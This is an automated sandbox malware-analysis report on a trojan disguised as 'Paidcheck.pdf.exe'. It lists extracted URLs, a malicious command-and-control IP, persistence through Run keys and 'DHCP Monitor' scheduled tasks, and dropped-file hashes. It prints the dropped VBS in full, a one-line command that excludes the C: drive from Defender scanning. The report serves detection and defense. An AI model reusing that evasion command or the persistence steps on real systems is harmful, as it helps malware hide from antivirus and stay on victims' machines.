        http://www.apache.org/licenses/LICENSE-2.0Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpfalse
          high
          http://www.fontbureau.comPaidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpfalse
            high
            http://www.fontbureau.com/designersGPaidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpfalse
              high
              http://www.fontbureau.com/designers/?Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpfalse
                high
                http://www.founder.com.cn/cn/bThePaidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://www.fontbureau.com/designers?Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpfalse
                  high
                  https://go.micropowershell.exe, 0000000B.00000003.373704213.00000000055FF000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  http://www.tiro.comPaidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  http://www.fontbureau.com/designersPaidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpfalse
                    high
                    http://www.goodfont.co.krPaidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://google.comRegAsm.exe, 0000000A.00000002.489583324.0000000006AE0000.00000004.00000001.sdmpfalse
                      high
                      http://www.carterandcone.comlPaidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://www.sajatypeworks.comPaidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://www.typography.netDPaidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://www.fontbureau.com/designers/cabarga.htmlNPaidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpfalse
                        high
                        http://www.founder.com.cn/cn/cThePaidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://www.galapagosdesign.com/staff/dennis.htmPaidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://fontfabrik.comPaidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://www.founder.com.cn/cnPaidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://www.fontbureau.com/designers/frere-jones.htmlPaidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpfalse
                          high
                          http://crl.microsoRegAsm.exe, 0000000A.00000002.479021599.0000000000EC2000.00000004.00000020.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://crl.microsofXRegAsm.exe, 0000000A.00000002.479021599.0000000000EC2000.00000004.00000020.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.jiyu-kobo.co.jp/Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://www.galapagosdesign.com/DPleasePaidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://www.fontbureau.com/designers8Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpfalse
                            high
                            http://www.fonts.comPaidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpfalse
                              high
                              http://www.sandoll.co.krPaidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://www.urwpp.deDPleasePaidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://www.zhongyicts.com.cnPaidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://crl.micrpowershell.exe, 0000000B.00000003.376733884.0000000009675000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePaidcheck.pdf.exe, 00000000.00000002.306467262.0000000002F7B000.00000004.00000001.sdmpfalse
                                high
                                http://www.sakkal.comPaidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown

                                Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public

                                IPDomainCountryFlagASNASN NameMalicious
                                217.138.212.57
                                unknownUnited Kingdom
                                9009M247GBtrue

                                General Information

                                Joe Sandbox Version:33.0.0 White Diamond
                                Analysis ID:452385
                                Start date:22.07.2021
                                Start time:09:32:06
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 12m 44s
                                Hypervisor based Inspection enabled:false
                                Report type:light
                                Sample file name:Paidcheck.pdf.exe
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                Number of analysed new started processes analysed:26
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@20/24@0/1
                                EGA Information:Failed
                                HDC Information:
                                • Successful, ratio: 13.2% (good quality ratio 11.2%)
                                • Quality average: 63.3%
                                • Quality standard deviation: 27.4%
                                HCA Information:
                                • Successful, ratio: 97%
                                • Number of executed functions: 0
                                • Number of non-executed functions: 0
                                Cookbook Comments:
                                • Adjust boot time
                                • Enable AMSI
                                • Found application associated with file extension: .exe
                                Warnings:
                                Show All
                                • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                • TCP Packets have been reduced to 100
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                09:32:57API Interceptor1x Sleep call for process: Paidcheck.pdf.exe modified
                                09:33:48AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run DHCP Monitor C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                09:33:50Task SchedulerRun new task: DHCP Monitor path: "C:\Users\user\AppData\Local\Temp\RegAsm.exe" s>$(Arg0)
                                09:33:51Task SchedulerRun new task: DHCP Monitor Task path: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" s>$(Arg0)
                                09:34:11API Interceptor32x Sleep call for process: powershell.exe modified

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                217.138.212.57PO-110940,pdf.exeGet hashmaliciousBrowse

                                  Domains

                                  No context

                                  ASN

                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                  M247GBList_to_clear_62237.xlsmGet hashmaliciousBrowse
                                  • 5.61.62.219
                                  List_to_clear_62237.xlsmGet hashmaliciousBrowse
                                  • 5.61.62.219
                                  87597.exeGet hashmaliciousBrowse
                                  • 45.141.152.18
                                  NJrrXRv8zVGet hashmaliciousBrowse
                                  • 196.19.8.206
                                  DpuO7oic9y.exeGet hashmaliciousBrowse
                                  • 86.106.143.143
                                  download.dat.exeGet hashmaliciousBrowse
                                  • 194.187.251.163
                                  WindowsFormsApp1.exeGet hashmaliciousBrowse
                                  • 194.187.251.163
                                  file2.exeGet hashmaliciousBrowse
                                  • 141.98.102.243
                                  Anarchy_Client.exeGet hashmaliciousBrowse
                                  • 77.243.181.86
                                  2N9Nc0H82F.exeGet hashmaliciousBrowse
                                  • 37.120.206.86
                                  VsaTool.exeGet hashmaliciousBrowse
                                  • 185.156.172.76
                                  UpdateTool.exeGet hashmaliciousBrowse
                                  • 185.156.172.76
                                  KaseyaFix2.exeGet hashmaliciousBrowse
                                  • 185.156.172.76
                                  Update[1].exeGet hashmaliciousBrowse
                                  • 185.156.172.76
                                  fpNebX354Y.exeGet hashmaliciousBrowse
                                  • 185.156.172.76
                                  fpNebX354Y.exeGet hashmaliciousBrowse
                                  • 185.156.172.76
                                  rz89FRwKvB.exeGet hashmaliciousBrowse
                                  • 172.94.109.9
                                  XH7Kdor28T.exeGet hashmaliciousBrowse
                                  • 185.144.82.239
                                  d7b.dllGet hashmaliciousBrowse
                                  • 81.92.202.190
                                  SecureMessageAtt.HTMLGet hashmaliciousBrowse
                                  • 45.141.152.18

                                  JA3 Fingerprints

                                  No context

                                  Dropped Files

                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                  C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe02_extracted.exeGet hashmaliciousBrowse
                                    Payment Order_PDF.vbsGet hashmaliciousBrowse
                                      Quotation.exeGet hashmaliciousBrowse
                                        DhStRngAC2.exeGet hashmaliciousBrowse
                                          1.exeGet hashmaliciousBrowse
                                            Img 06 30 2021 4677.exeGet hashmaliciousBrowse
                                              Purchase#20880.pdf.exeGet hashmaliciousBrowse
                                                2216DAF252B5F3B4B00238A097E0DF2A57C20780DCE0F.exeGet hashmaliciousBrowse
                                                  pVOLEckzk1.exeGet hashmaliciousBrowse
                                                    12ThYgKql3.exeGet hashmaliciousBrowse
                                                      Invoice NeededPDF.exeGet hashmaliciousBrowse
                                                        LKpLx8L8q9.exeGet hashmaliciousBrowse
                                                          3y4JNjrN1C.exeGet hashmaliciousBrowse
                                                            SecuriteInfo.com.Trojan.GenericKD.37108638.5946.exeGet hashmaliciousBrowse
                                                              kYvdP38gUv.exeGet hashmaliciousBrowse
                                                                qfjDTDPA9L.exeGet hashmaliciousBrowse
                                                                  wmaJOYGy7Q.exeGet hashmaliciousBrowse
                                                                    Trainer v22.3.exeGet hashmaliciousBrowse
                                                                      Trainer v 4.6.1.exeGet hashmaliciousBrowse
                                                                        PO 389293LC_pdf.exeGet hashmaliciousBrowse

                                                                          Created / dropped Files

                                                                          C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                                                          Process:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                          File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):64616
                                                                          Entropy (8bit):6.037264560032456
                                                                          Encrypted:false
                                                                          SSDEEP:768:J8XcJiMjm2ieHlPyCsSuJbn8dBhFVBSMQ6Iq8TSYDKpgLaDViRLNdr:9YMaNylPYSAb8dBnTHv8DKKaDVkX
                                                                          MD5:6FD7592411112729BF6B1F2F6C34899F
                                                                          SHA1:5E5C839726D6A43C478AB0B95DBF52136679F5EA
                                                                          SHA-256:FFE4480CCC81B061F725C54587E9D1BA96547D27FE28083305D75796F2EB3E74
                                                                          SHA-512:21EFCC9DEE3960F1A64C6D8A44871742558666BB792D77ACE91236C7DBF42A6CA77086918F363C4391D9C00904C55A952E2C18BE5FA1A67A509827BFC630070D
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                                          • Antivirus: Metadefender, Detection: 0%, Browse
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Joe Sandbox View:
                                                                          • Filename: 02_extracted.exe, Detection: malicious, Browse
                                                                          • Filename: Payment Order_PDF.vbs, Detection: malicious, Browse
                                                                          • Filename: Quotation.exe, Detection: malicious, Browse
                                                                          • Filename: DhStRngAC2.exe, Detection: malicious, Browse
                                                                          • Filename: 1.exe, Detection: malicious, Browse
                                                                          • Filename: Img 06 30 2021 4677.exe, Detection: malicious, Browse
                                                                          • Filename: Purchase#20880.pdf.exe, Detection: malicious, Browse
                                                                          • Filename: 2216DAF252B5F3B4B00238A097E0DF2A57C20780DCE0F.exe, Detection: malicious, Browse
                                                                          • Filename: pVOLEckzk1.exe, Detection: malicious, Browse
                                                                          • Filename: 12ThYgKql3.exe, Detection: malicious, Browse
                                                                          • Filename: Invoice NeededPDF.exe, Detection: malicious, Browse
                                                                          • Filename: LKpLx8L8q9.exe, Detection: malicious, Browse
                                                                          • Filename: 3y4JNjrN1C.exe, Detection: malicious, Browse
                                                                          • Filename: SecuriteInfo.com.Trojan.GenericKD.37108638.5946.exe, Detection: malicious, Browse
                                                                          • Filename: kYvdP38gUv.exe, Detection: malicious, Browse
                                                                          • Filename: qfjDTDPA9L.exe, Detection: malicious, Browse
                                                                          • Filename: wmaJOYGy7Q.exe, Detection: malicious, Browse
                                                                          • Filename: Trainer v22.3.exe, Detection: malicious, Browse
                                                                          • Filename: Trainer v 4.6.1.exe, Detection: malicious, Browse
                                                                          • Filename: PO 389293LC_pdf.exe, Detection: malicious, Browse
                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...xX.Z..............0.............^.... ........@.. ....................... ............`.....................................O.......8...............h>........................................................... ............... ..H............text...d.... ...................... ..`.rsrc...8...........................@..@.reloc..............................@..B................@.......H........A...p..........T................................................~P...-.r...p.....(....(....s.....P...*..0.."........(......-.r...p.rI..p(....s....z.*...0..........(....~P.....o......*..(....*n(.....(..........%...(....*~(.....(..........%...%...(....*.(.....(..........%...%...%...(....*V.(......}Q.....}R...*..{Q...*..{R...*...0...........(.......i.=...}S......i.@...}T......i.@...}U.....+m...(....o .....r]..p.o!...,..{T.......{U........o"....+(.ra..p.o!...,..{T.......
                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Paidcheck.pdf.exe.log
                                                                          Process:C:\Users\user\Desktop\Paidcheck.pdf.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:modified
                                                                          Size (bytes):1119
                                                                          Entropy (8bit):5.356708753875314
                                                                          Encrypted:false
                                                                          SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzd
                                                                          MD5:3197B1D4714B56F2A6AC9E83761739AE
                                                                          SHA1:3B38010F0DF51C1D4D2C020138202DABB686741D
                                                                          SHA-256:40586572180B85042FEFED9F367B43831C5D269751D9F3940BBC29B41E18E9F6
                                                                          SHA-512:58EC975A53AD9B19B425F6C6843A94CC280F794D436BBF3D29D8B76CA1E8C2D8883B3E754F9D4F2C9E9387FE88825CCD9919369A5446B1AFF73EDBE07FA94D88
                                                                          Malicious:true
                                                                          Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log
                                                                          Process:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:modified
                                                                          Size (bytes):42
                                                                          Entropy (8bit):4.0050635535766075
                                                                          Encrypted:false
                                                                          SSDEEP:3:QHXMKa/xwwUy:Q3La/xwQ
                                                                          MD5:84CFDB4B995B1DBF543B26B86C863ADC
                                                                          SHA1:D2F47764908BF30036CF8248B9FF5541E2711FA2
                                                                          SHA-256:D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
                                                                          SHA-512:485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
                                                                          Malicious:true
                                                                          Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..
                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\dhcpmon.exe.log
                                                                          Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:modified
                                                                          Size (bytes):42
                                                                          Entropy (8bit):4.0050635535766075
                                                                          Encrypted:false
                                                                          SSDEEP:3:QHXMKa/xwwUy:Q3La/xwQ
                                                                          MD5:84CFDB4B995B1DBF543B26B86C863ADC
                                                                          SHA1:D2F47764908BF30036CF8248B9FF5541E2711FA2
                                                                          SHA-256:D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
                                                                          SHA-512:485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
                                                                          Malicious:false
                                                                          Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..
                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):14734
                                                                          Entropy (8bit):4.993014478972177
                                                                          Encrypted:false
                                                                          SSDEEP:384:cBVoGIpN6KQkj2Wkjh4iUxtaKdROdBLNXp5nYoGib4J:cBV3IpNBQkj2Lh4iUxtaKdROdBLNZBYH
                                                                          MD5:8D5E194411E038C060288366D6766D3D
                                                                          SHA1:DC1A8229ED0B909042065EA69253E86E86D71C88
                                                                          SHA-256:44EEE632DEDFB83A545D8C382887DF3EE7EF551F73DD55FEDCDD8C93D390E31F
                                                                          SHA-512:21378D13D42FBFA573DE91C1D4282B03E0AA1317B0C37598110DC53900C6321DB2B9DF27B2816D6EE3B3187E54BF066A96DB9EC1FF47FF86FEA36282AB906367
                                                                          Malicious:false
                                                                          Preview: PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):22180
                                                                          Entropy (8bit):5.6036359814823635
                                                                          Encrypted:false
                                                                          SSDEEP:384:2tCD+0oF8RO6c9Q2M4KnQwICu7V9wmSJUeRe1BMkmZZkV7ENWDOD4I5iOYs:/O6QE4KQw9VmXeNDW42S
                                                                          MD5:479FD065539F6CB9A9073194EE43BA62
                                                                          SHA1:A42CBC7BA81ABA1675795855760D409D15B519A0
                                                                          SHA-256:CD0AC9E26FBF8ED83477179601F435FF3AB5C7E265A3267F2BD55F9A564558D6
                                                                          SHA-512:873047CDCAD971FB4AE20D00592B561E6DB24022BE65F761260354608C0EE772E931EF56CEF7F6D122690DD68E8364D9E147A386B330A9C461D0F9AE72607581
                                                                          Malicious:false
                                                                          Preview: @...e...........a...........7.).......h.8............@..........H...............<@.^.L."My...::..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                          C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                          Process:C:\Users\user\Desktop\Paidcheck.pdf.exe
                                                                          File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):64616
                                                                          Entropy (8bit):6.037264560032456
                                                                          Encrypted:false
                                                                          SSDEEP:768:J8XcJiMjm2ieHlPyCsSuJbn8dBhFVBSMQ6Iq8TSYDKpgLaDViRLNdr:9YMaNylPYSAb8dBnTHv8DKKaDVkX
                                                                          MD5:6FD7592411112729BF6B1F2F6C34899F
                                                                          SHA1:5E5C839726D6A43C478AB0B95DBF52136679F5EA
                                                                          SHA-256:FFE4480CCC81B061F725C54587E9D1BA96547D27FE28083305D75796F2EB3E74
                                                                          SHA-512:21EFCC9DEE3960F1A64C6D8A44871742558666BB792D77ACE91236C7DBF42A6CA77086918F363C4391D9C00904C55A952E2C18BE5FA1A67A509827BFC630070D
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                                          • Antivirus: Metadefender, Detection: 0%, Browse
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...xX.Z..............0.............^.... ........@.. ....................... ............`.....................................O.......8...............h>........................................................... ............... ..H............text...d.... ...................... ..`.rsrc...8...........................@..@.reloc..............................@..B................@.......H........A...p..........T................................................~P...-.r...p.....(....(....s.....P...*..0.."........(......-.r...p.rI..p(....s....z.*...0..........(....~P.....o......*..(....*n(.....(..........%...(....*~(.....(..........%...%...(....*.(.....(..........%...%...%...(....*V.(......}Q.....}R...*..{Q...*..{R...*...0...........(.......i.=...}S......i.@...}T......i.@...}U.....+m...(....o .....r]..p.o!...,..{T.......{U........o"....+(.ra..p.o!...,..{T.......
                                                                          C:\Users\user\AppData\Local\Temp\_Fimmlfqfvyftboxhdsnydr.vbs
                                                                          Process:C:\Users\user\Desktop\Paidcheck.pdf.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):182
                                                                          Entropy (8bit):4.995421543347364
                                                                          Encrypted:false
                                                                          SSDEEP:3:FER/n0eFHgSSJJF2uV1HeGAFddGeWLCXknRAuWXp5cViEaKC5SufyM1K/RFofD6T:FER/lFHsCu/eGgdEYmRAuWXp+NaZ5Su4
                                                                          MD5:8F1279E3972239624A9E5037A4261E8A
                                                                          SHA1:D45F5CD9A81863BF6B486F77FCB0A1497DD46446
                                                                          SHA-256:C07EF3D32222554903427589627F33C222F6D507D1F161A5FCD11EBF29BFA6CC
                                                                          SHA-512:F0380E6ED1B58EE2A9B83D662E0486AF7352B5B72F72375B72F69E567297F3DC08AD372045E58DD81BC62DE32C9DB22F7A670D208F80B2BEC83B941FF790EDE8
                                                                          Malicious:true
                                                                          Preview: CreateObject("WScript.Shell").Run "powershell Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe'", 0, False
                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2qglplkd.nbo.ps1
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:very short file (no magic)
                                                                          Category:dropped
                                                                          Size (bytes):1
                                                                          Entropy (8bit):0.0
                                                                          Encrypted:false
                                                                          SSDEEP:3:U:U
                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                          Malicious:false
                                                                          Preview: 1
                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ai3xzej.ihr.psm1
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:very short file (no magic)
                                                                          Category:dropped
                                                                          Size (bytes):1
                                                                          Entropy (8bit):0.0
                                                                          Encrypted:false
                                                                          SSDEEP:3:U:U
                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                          Malicious:false
                                                                          Preview: 1
                                                                          C:\Users\user\AppData\Local\Temp\tmp4FE3.tmp
                                                                          Process:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):1307
                                                                          Entropy (8bit):5.1055546710401485
                                                                          Encrypted:false
                                                                          SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0aa5xtn:cbk4oL600QydbQxIYODOLedq3Ba5j
                                                                          MD5:E1762CDA6D6A3715B829E81B77FF06F7
                                                                          SHA1:B9F6318A5E4CDB1462E45A0B08EE46D303C40715
                                                                          SHA-256:48A86564D25864484ABE34BAA5B71890B8AF30ADE8AC1CF14BBACAE28036F09F
                                                                          SHA-512:DC6218645DBE168DCB8DE01124694FF26ED033E7A5CE066FAA1D00817F2E51D167938B4FF4231F514F60895EF0FFE95880D401358C69E49126A219CBF7D3E705
                                                                          Malicious:true
